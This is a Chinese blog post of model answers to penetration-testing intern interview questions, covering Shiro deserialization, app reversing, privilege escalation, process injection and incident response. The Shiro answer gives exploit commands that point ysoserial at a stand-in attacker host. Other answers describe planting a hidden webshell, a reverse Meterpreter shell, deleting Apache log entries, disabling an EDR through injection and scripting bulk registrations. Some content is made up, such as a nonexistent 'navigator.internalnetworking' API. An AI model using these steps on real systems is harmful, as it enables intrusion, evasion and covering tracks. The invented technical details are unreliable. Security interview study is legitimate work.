2025年渗透测试面试题总结-华顺信安[实习]安全服务工程师(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
华顺信安[实习]安全服务工程师
1. 自我介绍
2. 红蓝队经验
3. Shiro漏洞知识体系
4. APP渗透测试方法论
5. Xposed框架与逆向工程
6. 三大漏洞原理与修复
7. 内网XSS后续利用链
8. 目标站渗透流程
9. 系统提权技术栈
10. 进程注入技术
11. 应急响应经验
12. 系统应急操作手册
13. 安全工具使用情况
14. APK逆向能力
15. Python开发水平
16. PHP审计方法论
华顺信安[实习]安全服务工程师
1. 自我介绍 2. 红蓝队经验 3. 关于shiro漏洞了解多少 4. 说说你APP测试的经验 5. xposed用的什么框架,有没有自己写过app解密 6. Xss、SSRF、SQL 产生的原因,修复方案? 7. 如果你Xss打了后台,发现是内网的怎么办 8. 假设给你一个目标站,你要怎么做? 9. linux和windows提权知多少。 10. 会不会进程注入? 11. 做过几次应急? 12. 讲讲windows和linux应急你咋做的 13. 用过没用过我们家的goby和fofa? 14. 会不会apk反编译? 15. 你python水平咋样? 16. 你php怎么审的.1. 自我介绍
网络安全研究员,主攻渗透测试与APT攻防溯源,3年红队作战经验,擅长Web漏洞链构造、内网横向及隐蔽通道设计。持有OSEP、CISSP认证,多次在TSRC、ASRC等平台获高危漏洞奖励,主导过金融、政务领域红蓝对抗演练。
2. 红蓝队经验
- 红队视角:
- 钓鱼链开发:基于Cobalt Strike的HTA宏文档投递,配合DNS隐蔽隧道C2通信。
- 域渗透:利用MS14-068伪造PAC提权,通过BloodHound可视化攻击路径。
- 蓝队实践:
- EDR规则优化:针对Mimikatz的LSASS内存扫描行为部署Sysmon告警(Event ID 10)。
- 日志分析:通过ELK聚合Windows 4624/4625登录事件,识别异常Kerberos票据请求。
3. Shiro漏洞知识体系
- 漏洞核心:AES硬编码密钥(
kPH+bIxk5D2deZiIxcaaaA==)导致反序列化攻击(CVE-2016-4437)。- 实战利用:
python# 生成恶意RememberMe Cookie ysoserial.jar JRMPClient 'attacker_ip:port' > payload openssl enc -aes-128-cbc -K {key_hex} -iv 0 -in payload -out rememberMe- 防御方案:升级Shiro至1.2.5+,自定义
setCipherKey动态密钥,启用Cookie完整性校验。
4. APP渗透测试方法论
- 测试框架:
- 静态分析:Jadx反编译APK,定位硬编码API密钥、SSL Pinning绕过点。
- 动态插桩:Frida Hook
checkServerTrusted方法绕过证书校验。- 典型漏洞:
- 逻辑缺陷:修改APK的
AndroidManifest.xml中android:debuggable="true"进行调试注入。- 数据泄露:通过
/data/data/pkg_name/databases提取未加密SQLite数据。
5. Xposed框架与逆向工程
- 工具链:LSPosed(Android 11+适配) + XposedBridge API,针对SSL库注入实现中间人解密。
- 解密实战:对某金融APP的
libencrypt.so进行IDA Pro逆向,定位JNI_OnLoad函数中的AES-CBC模式密钥硬编码问题。
6. 三大漏洞原理与修复
漏洞类型 成因 修复方案 XSS 未对 <script>等标签过滤CSP头设置 script-src 'self'SSRF 服务端未校验用户输入URL 启用URL白名单校验 + 禁用 file://协议SQLi 拼接SQL语句未参数化 预编译语句(PDO)+ 输入类型强校验
7. 内网XSS后续利用链
- 信息搜集:通过XSS执行
navigator.internalnetworking获取内网IP段。- 代理穿透:注入WebSocket隧道代码,建立
ws://192.168.1.1:8080/proxy转发SOCKS5流量。- 横向扩展:结合浏览器密码管理器提取Saved Credentials攻击域控。
8. 目标站渗透流程
- 指纹识别:Wappalyzer识别CMS版本(如ThinkPHP 5.0.23 RCE)。
- 入口突破:FUZZ目录发现
/admin/login弱口令(admin/admin123)。- 权限维持:上传
.user.ini隐藏Webshell,定时任务反弹Meterpreter。- 痕迹清理:删除Apache日志
/var/log/apache2/access.log中攻击IP记录。
9. 系统提权技术栈
- Windows提权:
- 服务漏洞:ScManager数据库修改服务BINARY_PATH(AccessChk.exe 提权)。
- 令牌窃取:利用Incognito模仿SYSTEM进程令牌(需SeDebugPrivilege)。
- Linux提权:
- SUID滥用:
find / -perm -4000 2>/dev/null查找可利用程序(如vim、find)。- 内核漏洞:DirtyCow(CVE-2016-5195)覆盖/etc/passwd实现root持久化。
10. 进程注入技术
- DLL注入:通过CreateRemoteThread将恶意DLL加载至explorer.exe 内存。
- APC注入:QueueUserAPC强制目标线程执行Shellcode,绕过部分AV检测。
- 实战案例:对某EDR进程注入卸载模块,临时禁用其监控功能。
11. 应急响应经验
参与过6次大型应急,包含勒索病毒(GlobeImposter变种)处置、APT组织WebShell溯源。平均响应时间低于2小时,依托Velociraptor实现自动化取证。
12. 系统应急操作手册
- Windows应急:
- 内存取证:Dump LSASS进程排查Mimikatz痕迹(procdump.exe )。
- 注册表分析:
HKLM\SYSTEM\CurrentControlSet\Services查找异常服务项。- Linux应急:
- 进程排查:
lsof -p $PID定位恶意进程文件路径。- Rootkit检测:使用rkhunter扫描隐藏内核模块。
13. 安全工具使用情况
- Goby应用:联动Xray扫描器自动识别Weblogic未授权(CVE-2020-14882)。
- FOFA技巧:
app="Apache-Shiro" && country="CN"快速定位Shiro资产。
14. APK逆向能力
- 工具链:Jadx-GUI静态分析 + Frida动态脱壳(针对某加固厂商的DexClassLoader加载机制)。
- 案例:某社交APP的HMAC签名算法逆向,构造批量注册脚本。
15. Python开发水平
- 自动化开发:基于MitmProxy实现流量重放测试工具,支持JS混淆破解。
- 漏洞利用:编写JWT爆破脚本(PyJWT库 + 多线程字典攻击)。
- 项目地址:GitHub开源多个红队工具(Star数500+)。
16. PHP审计方法论
- 危险函数追踪:全局搜索
eval()、system()等敏感函数调用链。- 反序列化漏洞:审计
unserialize()参数是否可控,寻找POP链构造点。- 框架安全:检查Laravel的
.env配置泄露或未开启CSRF保护。- 实战案例:发现某CMS的
$_GET['type']直接拼接SQL语句导致报错注入。
相关文章:
)
2025年渗透测试面试题总结-华顺信安[实习]安全服务工程师(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 华顺信安[实习]安全服务工程师 1. 自我介绍 2. 红蓝队经验 3. Shiro漏洞知识体系 4. APP渗透测试方法…...
Mermaid 使用快速入门
使用AI 生成Mermaid 代码,导入Vscode, 安装Mermaid Preview 插件 --- title: config:theme: forest --- graph TDA[开始] --> B{条件判断}B -->|是| C[执行操作1]B -->|否| D[执行操作2] theme可改变主题,可选主题: default - 这是…...
Windows系统下MySQL 8.4.5压缩包安装详细教程
一、MySQL 8.4.5新特性概览 相较于旧版本,MySQL 8.4.5在性能与功能上实现了显著提升: 性能优化:官方测试显示,在高并发场景下,其读写性能较5.7版本提升近2倍,尤其在处理热点数据竞争问题时表现更为出色。…...
机器学习10-随机森林
随机森林学习笔记 一、随机森林简介 随机森林(Random Forest)是一种集成学习算法,基于决策树构建模型。它通过组合多个决策树的结果来提高模型的准确性和稳定性。随机森林的核心思想是利用“集成”的方式,将多个弱学习器组合成一…...
【缺陷】GaN和AlN中的掺杂特性
1997 年 5 月 9 日,北卡罗来纳州立大学的 P. Bogusławski 和 J. Bernholc 等人在《Physical Review B》期刊发表了题为《Doping properties of C, Si, and Ge impurities in GaN and AlN》的文章,基于量子分子动力学方法,研究了碳(C)、硅(Si)和锗(Ge)杂质在氮化镓(G…...
游戏引擎学习第298天:改进排序键 - 第1部分
关于向玩家展示多个房间层所需的两种 Z 值 我们在前一天基本完成了为渲染系统引入分层 Z 值的工作,但还没有完全完成所有细节。我们开始引入图形渲染中的分层概念,即在 Z 轴方向上拥有多个独立图层,每个图层内部再使用一个单独的 Z 值来实现…...
AI大模型从0到1记录学习 大模型技术之数学基础 day26
高等数学 导数 导数的概念 导数(derivative)是微积分中的一个概念。函数在某一点的导数是指这个函数在这一点附近的变化率(即函数在这一点的切线斜率)。导数的本质是通过极限的概念对函数进行局部的线性逼近。 当函数f的自变量在…...
)
计算机视觉与深度学习 | matlab实现ARIMA-WOA-CNN-LSTM时间序列预测(完整源码和数据)
以下是一个基于MATLAB的ARIMA-WOA-CNN-LSTM时间序列预测框架。由于完整代码较长,此处提供核心模块和实现思路,完整源码和数据可通过文末方式获取。 1. 数据准备(示例数据) 使用MATLAB内置的航空乘客数据集: % 加载数据 data = readtable(airline-passengers.csv); data …...
【C++】vector模拟实现
实现以下功能: 构造函数:a.无参默认构造 b.n个val构造 c.迭代器区间构造 d.initializer_list构造,类似于数组 e.拷贝构造 赋值重载 [ ]重载 实现reserve接口 实现size(),capacity()接口 实现push_bakc接口&#…...
门店管理五大痛点解析:如何用数字化系统实现高效运营
实体店竞争白热化,五大管理痛点正悄悄吞噬利润:客户资源流失、数据决策滞后、员工效率模糊、合同风险暗藏、利润核算混乱。本文直击核心问题,拆解数字化系统如何精准破局。 一、传统管理模式的五大核心痛点 1. 客户资源管理粗放化 老…...
双指针法高效解决「移除元素」问题
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 双指针法高效解决「移除元素」问题 双指针法高效解决「移除元素」问题一、问题描述二、解法解析:双指针法1. 核心思想2. 算法步骤3. 执行过程示例 三、关键点分析…...
)
【Linux笔记】——线程同步信号量与环形队列生产者消费者模型的实现(PV操作)
🔥个人主页🔥:孤寂大仙V 🌈收录专栏🌈:Linux 🌹往期回顾🌹:【Linux笔记】——线程同步条件变量与生产者消费者模型的实现 🔖流水不争,争的是滔滔不…...
武汉科技大学人工智能与演化计算实验室许志伟课题组参加第八届智能优化与调度学术会议
武汉科技大学人工智能与演化计算实验室许志伟课题组参加第八届智能优化与调度学术会议 2025年5月15日至18日,第八届智能优化与调度学术会议在青岛金沙滩希尔顿酒店隆重召开。本次会议由青岛科技大学、湖南省系统仿真学会联合主办,中国仿真学会智能仿真优…...
SparkContext介绍
目录 1. 集群管理接口2. RDD操作中枢3. 任务分发引擎4. 执行环境配置5. 性能监控枢纽 SparkContext是Apache Spark的核心组件,其作用可概括为以下五个关键维度: 1. 集群管理接口 作为与集群管理器(YARN/Mesos/Standalone)通信的唯…...
海外盲盒系统开发:重构全球消费体验的科技引擎
当盲盒文化席卷全球,海外盲盒系统开发已成为重构消费体验的核心赛道。数据显示,2025年全球盲盒市场规模突破120亿,东南亚市场年增长率达4540。我们开发的海外盲盒系统,以技术创新为驱动,打造覆盖全链路的全球化解决方案…...
IP风险画像技术:如何用20+维度数据构建网络安全护城河?
IP风险画像技术作为一种先进的网络安全手段,正逐步成为构建网络安全护城河的重要工具。通过多维度数据的分析和挖掘,IP风险画像技术能够精准识别网络中的潜在威胁,为企业和组织提供更加全面的安全保障。 IP风险画像技术基于IP地址的行为分析…...
Vitest下一代前端单元测试框架
什么是Vitest? Vitest是有vue官方主导开发的下一代测试框架,一个原生支持Vite的测试框架。非常快速。 Vitest 与 Jest 兼容,具有开箱即用的 ESM、Typescript 和 JSX 支持,并且由 esbuild 提供支持。它在测试过程中使用 Vite 开发…...
车道线检测:自动驾驶的“眼睛”
在自动驾驶技术的庞大体系中,车道线检测扮演着至关重要的角色,它就像是自动驾驶汽车的“眼睛”,帮助车辆感知道路边界,从而实现安全、准确的行驶。今天,我们就来深入探讨一下车道线检测的奥秘,看看它是如何…...
基于NLP技术的客户投诉与需求文本分类方法研究
目录 摘要 1. 引言 2. 文本分类基础 2.1 文本分类的定义与类型 2.2 文本分类的评价指标 3. 传统文本分类方法 3.1 基于TF-IDF和SVM的方法 3.2 基于主题模型和词向量的改进方法 4. 深度学习文本分类方法 4.1 TextCNN模型 4.2 BiLSTM模型 4.3 注意力机制与Transformer…...
HarmonyOS5云服务技术分享--自有账号对接AGC认证
✨ 手把手教你:用自有账号玩转华为AGC认证服务 ✨ Hi 各位开发者朋友~👋 今天咱们来聊聊如何将自家已有的账号系统与华为的AppGallery Connect(AGC)认证服务无缝对接。不用重复造轮子,还能享受AGC…...
算法与数据结构:位运算与快速幂
文章目录 位运算快速幂 位运算 在计算机的世界中,一切数字都是二进制的。类比于现实世界中我们所使用的十进制,二进制即为「逢二进一」的运算体系。 我们以 B、D 来分别标记二进制与十进制,例如 10D 表示十进制中的 10,而 10B 则…...
基于R语言的空间异质性数据分析技术
在自然和社会科学领域,存在大量与地理或空间相关的数据,这些数据通常具有显著的空间异质性。传统的统计学方法在处理这类数据时往往力不从心。基于R语言的一系列空间异质性数据分析方法,如地理加权回归(GWR)、地理加权…...
数据分析预备篇---Pandas的DataFrame的更多操作
DataFrame的统计方法 之前学习Series的时候接触了一些很实用的统计相关方法,包括max求最大值,min求最小值,sum求和,mean求平均值等。DataFrame有类似的方法,由于它是二维的,我们可以指定到底是沿着索引纵向操作,相当于沿着轴0(计算每列的统计量);还是说沿着列名横向操…...
:黏性阶段的功能优先级法则——七问决策模型与风险控制)
精益数据分析(73/126):黏性阶段的功能优先级法则——七问决策模型与风险控制
精益数据分析(73/126):黏性阶段的功能优先级法则——七问决策模型与风险控制 在创业的黏性阶段,如何从海量的功能创意中筛选出真正能提升用户留存的关键改动?今天,我们结合《精益数据分析》中的“开发功能…...
Linux系统之traceroute命令详解:追踪网络路径的核心工具
Linux系统之traceroute命令详解:追踪网络路径的核心工具 一、traceroute介绍1. 基本介绍2. 核心原理 二、安装与基本使用1. 安装traceroute2. 基础语法 三、基本使用四、常用参数与场景五、典型应用场景1. 定位网络延迟问题2. 检测防火墙拦截3. 绕过DNS解析问题4. 对…...
通义灵码2.5智能体模式联合MCP:打造自动化菜品推荐平台,实现从需求到部署的全流程创新
一、项目背景与目标 随着人工智能技术的快速发展,AI 辅助开发工具正在改变传统的软件开发模式。通义灵码 2.5 版本的发布,通过 Qwen3 模型 和 编程智能体模式 的结合,实现了从需求描述到代码生成的全流程自动化。同时,其对 魔搭M…...
Spring的AOP在什么场景下会失效?
SpringAOP是通过动态代理实现的,所以想要AOP生效就是需要动态代理生效,并且可以提前调用到代理对象的方法。 什么情况下会不走动态代理呢? 首先就是类内部的调用,比如一些私有方法的调用,内部类调用,以及同…...
基于规则引擎与机器学习的智能Web应用防火墙设计与实现
基于规则引擎与机器学习的智能Web应用防火墙设计与实现 引言:智能防御的必然选择 在2023年OWASP最新报告中,传统Web应用防火墙(WAF)对新型API攻击的漏报率高达67%,而误报导致的正常业务拦截损失每年超过2.3亿美元。面…...
NODE-I916 I721模块化电脑发布,AI算力与超低功耗的完美平衡
在智能工业与边缘计算蓬勃发展的今天,企业对计算设备的性能与能效需求日益严苛。全新推出NODE-I916与NODE-I721模块化电脑,分别搭载英特尔 酷睿™ Ultra 平台与Alder Lake-N平台,以差异化CPU配置为核心,为AI推理、工业自动化及嵌入…...
2024年热门AI趋势及回顾
人工智能的崛起 2024 年可能会被铭记为人工智能不再是一种技术新奇事物,而是成为现实的一年。微软、Salesforce 和 Intuit 等巨头将人工智能融入主流企业解决方案;从文案写作到数据分析,专门的人工智能应用程序和服务如雨后春笋般涌现&#…...
Python + moviepy:根据图片或数据高效生成视频全流程详解
前言 在数据可视化、自媒体内容生产、学术汇报等领域,我们常常需要将一组图片或一段变动的数据,自动合成为视频文件。这样不仅能提升内容表现力,也极大节省了人工操作时间。Python作为数据处理和自动化领域的王者,其`moviepy`库为我们提供了灵活高效的视频生成方案。本文将…...
文档债务拖累交付速度?5大优化策略文档自动化
开发者在追求开发速度的过程中,往往会忽视文档的编写,如省略设计文档、代码注释或API文档等。这种做法往往导致在后期调试阶段需要花费三倍以上的时间来理解代码逻辑,进而形成所谓的文档债务,严重拖累交付速度并造成资源浪费。而积…...
java接口自动化初识
简介 了解什么是接口和为什么要做接口测试。并且知道接口自动化测试应该学习哪些技术以及接口自动化测试的落地过程。 一、什么是接口 在这里我举了一个比较生活化的例子,比如我们有一台笔记本,在笔记本的两端有很多插口。例如:USB插口。那…...
Wan2.1 文生视频 支持批量生成、参数化配置和多语言提示词管理
Wan2.1 文生视频 支持批量生成、参数化配置和多语言提示词管理 flyfish 设计 一个基于 Wan2.1 文本到视频模型的自动化视频生成系统。 文件关系图 script.py ├── 读取 → config.json │ ├── 模型配置 → 加载AI模型 │ ├── 生成参数 → 控制生成质量 │ └…...
)
高阶数据结构——AVL树的实现(详细解答)
目录 1.AVL的概念 2.AVL树的实现 2.1 AVL树的插入 2.1.1 平衡因子的更新 2.1.2 AVL树的插入 2.2 旋转 2.2.1 旋转的原则 2.2.2 右单旋 2.2.3 左单旋 2.2.4 先左后右双旋转 2.2.5 先右后左双旋转(先左后右双旋转模型的镜像) 2.2.6 代码总结 2…...
工作流引擎-01-Activiti 是领先的轻量级、以 Java 为中心的开源 BPMN 引擎,支持现实世界的流程自动化需求
前言 大家好,我是老马。 最近想设计一款审批系统,于是了解一下关于流程引擎的知识。 下面是一些的流程引擎相关资料。 工作流引擎系列 工作流引擎-00-流程引擎概览 工作流引擎-01-Activiti 是领先的轻量级、以 Java 为中心的开源 BPMN 引擎&#x…...
自定义geojson生成物体的样式
在上节我们学习了如何在cesium中导入geojson数据,本节我们来学习如何让它变得更加炫酷. // 加载GeoJSON数据 // 使用Cesium的GeoJsonDataSource加载指定URL的地理数据 Cesium.GeoJsonDataSource.load("https://geo.datav.aliyun.com/areas_v3/bound/100000_full.json&quo…...
在tensorflow源码环境里,编译出独立的jni.so,避免依赖libtensorflowlite.so,从而实现apk体积最小化
需要在APP里使用tensorflow lite来运行PC端训练的model.tlite,又想apk的体积最小,尝试了如下方法: 1. 在gradle里配置 implementation("org.tensorflow:tensorflow-lite:2.16.1") 这样会引入tensorflow.jar,最终apk的…...
springboot框架 集成海康ISUP-SDK 并实现 协议透传给设备下发指令!
最近有一个需求 需要通过springboot框架 来和 海康的摄像头设备进行通信,就研究了一下 海康的官方ISUP-SDK 文档对接。这个sdk 主要实现了 第三方快速集成海康的设备。 海康的文档地址: https://open.hikvision.com/docs/docId?productId5cda567cf47ae8…...
【移动应用安全】Android系统安全与保护机制
Android系统安全与保护机制是一个多层次、多维度的防御体系,其安全架构与系统层级紧密耦合。以下是对各层级安全机制的扩展分析: Linux内核层(Linux Kernel)安全机制 强制访问控制(MAC) 通过SELinux&#…...
Spring Boot中如何使用RabbitMQ?
前面已经了解了怎么使用RabbitMQ的JDK原生客户端,现在我们来了解Spring Boot中如何使用RabbitMQ,在学习之前,先做好准备工作: 1. 添加依赖 在Spring Boot中使用RabbitMQ,需要使用如下依赖: <dependenc…...
)
kotlin 将一个list按条件分为两个list(partition )
前言 在安卓开发过程中,我们经常需要将一个列表按照特定条件拆分为两个子列表。随着对语言的深入理解,我发现了一些更高效、更简洁的实现方式,现在与大家分享。 实现 传统Java实现 假设我们有以下列表需要处理: List<Stri…...
R语言学习--Day04--数据分析技巧
在清洗完数据,在对数据分析前,我们要懂得先梳理一下我们的逻辑,即数据是什么形式的,要进行哪种分析,有可能呈现什么特点,进而再想怎么处理数据去画图可以最大程度地凸显我们要的特点。 一般来讲࿰…...
企业终端设备的安全管控
企业终端设备的安全管控是信息安全体系中的重要环节,涉及从设备准入到数据防护的全生命周期管理。 以下是一套系统化的解决方案,涵盖技术、管理和人员三个维度: 一、终端设备全生命周期管控 设备准入控制 802.1X网络认证:对接企业…...
桥梁凝冰在线监测装置:科技守护道路安全的新防线
在交通基础设施安全领域,桥梁凝冰问题始终是冬季道路管理的重点挑战。传统人工巡检方式存在时效性差、覆盖范围有限等缺陷,而桥梁凝冰在线监测装置的普及应用,正为这一难题提供智能化解决方案。 一、装置工作原理 桥梁凝冰在线监测装置通过多…...
【开源】一个基于 Vue3 和 Electron 开发的第三方网易云音乐客户端,具有与官方客户端相似的界面布局
🎵 XCMusic:高颜值第三方网易云音乐客户端 🎶 📍 项目亮点 XCMusic 是一款基于Vue3Electron开发的开源、跨平台网易云音乐客户端。 此音乐播放器基于 Electron 开发,旨在为用户提供简洁、美观、兼容多平台的音乐体验。…...
)
Android 中拖拽从一个组件到另外一个组件的写法(跨容器拖拽)
在 Android 中,拖拽一个图片(例如 ImageView)到另一个组件(如 LinearLayout、FrameLayout 等容器)涉及以下步骤: 准备工作 源组件:你从哪里开始拖动(如 ImageView)。 目…...
MATLAB实现GAN用于图像分类
生成对抗网络(GAN)是一种强大的生成模型,由生成器(Generator)和判别器(Discriminator)组成。生成器用于生成图像,判别器用于判断图像是真实的还是生成的。在MATLAB中实现GAN用于图像…...
武汉副市长李湛莅临指导 珈和展会精彩亮相引《武汉电视台》深度报道 以硬核科技赋能农业强链新范式获政府媒体“双重点赞”
为充分响应“双循环”新发展格局,深化区域产业协作、推动供需精准对接,进一步促进经济高质量发展,5月16日-18日,由武汉市经济和信息化局主办的2025年产业链供需对接(绍兴)推广活动在绍兴国际会展中心举办。…...